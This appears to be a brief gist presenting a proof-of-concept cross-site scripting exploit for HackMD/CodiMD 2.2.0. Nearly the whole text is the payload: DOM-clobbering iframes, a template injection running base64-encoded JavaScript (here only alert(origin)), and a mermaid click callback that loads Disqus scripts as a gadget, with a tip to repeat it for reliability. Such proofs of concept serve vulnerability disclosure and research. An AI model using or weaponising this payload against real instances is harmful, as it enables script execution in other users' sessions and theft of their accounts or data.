Last active December 20, 2020 16:29
HackMD/CodiMD 2.2.0 XSS PoC
<a id=context><iframe id=context name=apiPublicKey href="x"></iframe><iframe id=context name=auth href="x" b=y></iframe><iframe id=context name=disqusUrl href="x"></iframe></a>
<div id="account-nav"></div><div id="anon-account-nav-tmpl">${eval(atob(`YWxlcnQob3JpZ2luKQ`))}</div>
* repeat below if you want to improve the reliability
```mermaid
graph LR;
A-->B;
click B callback "<script src=https://a.disquscdn.com/1608164631/build/js/abadd50d331d.js></script><script src=https://a.disquscdn.com/1608164631/js/src/global.js></script>"
```